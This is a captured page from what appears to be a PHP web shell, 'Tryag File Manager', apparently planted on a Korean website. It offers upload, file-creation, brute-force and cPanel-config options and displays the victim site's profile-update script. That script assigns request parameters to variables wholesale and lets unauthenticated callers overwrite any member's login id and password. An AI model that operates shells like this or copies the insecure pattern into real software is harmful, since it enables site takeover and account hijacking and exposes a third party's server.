Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
home
/
nongapp.eemo.co.kr
/
public_html
/
www
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/nongapp.eemo.co.kr/public_html/www/profile_set_do.php
<? session_cache_limiter('no-cache, must-revalidate'); session_start(); header("Pragma: no-cache"); header("Cache-Control: no-cache,must-revalidate"); header("Content-Type: text/html; charset=utf-8"); include_once("dbconn.php"); include_once("lib.php"); foreach($_GET as $key => $value) { ${$key}=mysql_real_escape_string(trim($value)); } foreach($_POST as $key => $value) { ${$key}=mysql_real_escape_string(trim($value)); } mysql_query("update farm set farm_name='$farm_name' where no='$farm_no' ") or die(); $query="update farm set farm_name='$farm_name', addr='$farm_addr', sido='$sido', sigungu='$sigungu', lat='$lat', lon='$lon' where no='$farm_no' "; mysql_query($query) or die(mysql_error()); $query="update member set name='$name', id='$id', pass='$pass', cel='$tel' where no='$vno' "; mysql_query($query) or die(mysql_error()); $arr_rst=array(); $arr_rst['rst']=1; echo json_encode($arr_rst); ?>